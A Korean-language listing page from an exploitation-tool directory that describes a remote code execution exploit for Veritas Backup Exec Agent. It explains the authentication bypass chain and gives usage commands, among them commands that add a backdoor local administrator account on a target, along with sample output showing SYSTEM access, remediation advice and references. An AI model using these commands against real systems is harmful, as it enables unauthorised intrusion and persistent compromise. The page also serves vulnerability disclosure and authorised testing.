Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-27876 — Veritas Backup Exec Agent용 인증 없는 RCE 익스플로잇(CVE-2021-27876/77/78) — NDMP를 통한 SHA 인증 우회로 SYSTEM 권한 획득 | Kitploit
도구/GitHubGitHub/wingerbijay/cve-2021-27876
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingCommand and ControlAuthentication
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

Veritas Backup Exec Agent용 인증 없는 RCE 익스플로잇(CVE-2021-27876/77/78) — NDMP를 통한 SHA 인증 우회로 SYSTEM 권한 획득

저장소 보기
12개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-27876

Veritas Backup Exec Agent용 인증되지 않은 RCE 익스플로잇 (CVE-2021-27876/77/78) — NDMP를 통한 SHA 인증 우회로 SYSTEM 권한 획득

CVE 목록

CVE설명CVSS 3.1
CVE-2021-27876NDMP 프로토콜의 SHA 해시 조작을 통한 인증 우회9.8 Critical
CVE-2021-27877NDMP를 통한 인증되지 않은 임의 파일 읽기9.8 Critical
CVE-2021-27878NDMP_EXECUTE_COMMAND를 통한 임의 OS 명령 실행9.8 Critical

공지: Veritas VTS21-003

영향을 받는 버전

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (에이전트 리비전 ≤ 9.3)

수정 버전: Backup Exec 21.3 이상.


작동 원리

Veritas Backup Exec Agent는 TCP/10000 포트에서 수신 대기하며 NDMP(Network Data Management Protocol)를 사용합니다. 이 익스플로잇은 세 가지 취약점을 연쇄적으로 악용합니다:

  1. TLS 핸드셰이크 남용 — 에이전트는 자체 TLS 협상 중에 CSR을 요청합니다. 익스플로잇은 로컬 CA를 생성하고 에이전트의 CSR에 서명하여 핸드셰이크를 완료하고, 사전 공유 비밀 없이 소켓을 TLS로 업그레이드합니다.

  2. SHA 인증 우회 (CVE-2021-27876) — NDMP SHA 인증은 SHA256('\x00' * 64 + challenge)를 계산합니다. 비밀번호가 64바이트 0-패딩 블록으로 앞에 추가되고 서버 측에서 비밀번호 자료에 대한 검증이 이루어지지 않으므로, 모든 클라이언트는 비밀번호를 알지 못해도 Administrator로 인증할 수 있습니다.

  3. NDMP_EXECUTE_COMMAND (CVE-2021-27878) — 인증에 성공하면 NDMP_EXECUTE_COMMAND 메시지 유형이 NT AUTHORITY\SYSTEM 권한으로 임의의 OS 명령을 실행합니다. 출력은 C:\Windows\Temp\_be_out.txt로 리디렉션된 다음 NDMP_FILE_READ를 통해 다시 읽어옵니다.


요구 사항

Python 3.8+

최신 배포판에서는 Python이 "외부 관리(externally managed)"(PEP 668)로 표시되므로, 가상 환경에 종속성을 설치하세요:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

사용법

python3 be_rce.py

예시:

root@kitploit:~
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

Sample output:

[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

해결 방법

  • 모든 호스트에서 Veritas Backup Exec Agent를 21.3 이상으로 업그레이드
  • 호스트 방화벽 및 네트워크 ACL을 통해 TCP/10000을 승인된 백업 관리 호스트로만 제한
  • 환경 전체에서 Backup Exec Agent가 실행 중인 모든 호스트를 감사

참고 자료

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

법적 고지

이 도구는 승인된 침투 테스트 및 보안 연구 목적으로만 제공됩니다. 명시적인 서면 허가 없이 시스템을 대상으로 사용하는 것은 불법입니다. 저자는 오용으로 인한 어떠한 책임도 지지 않습니다.

도구 다운로드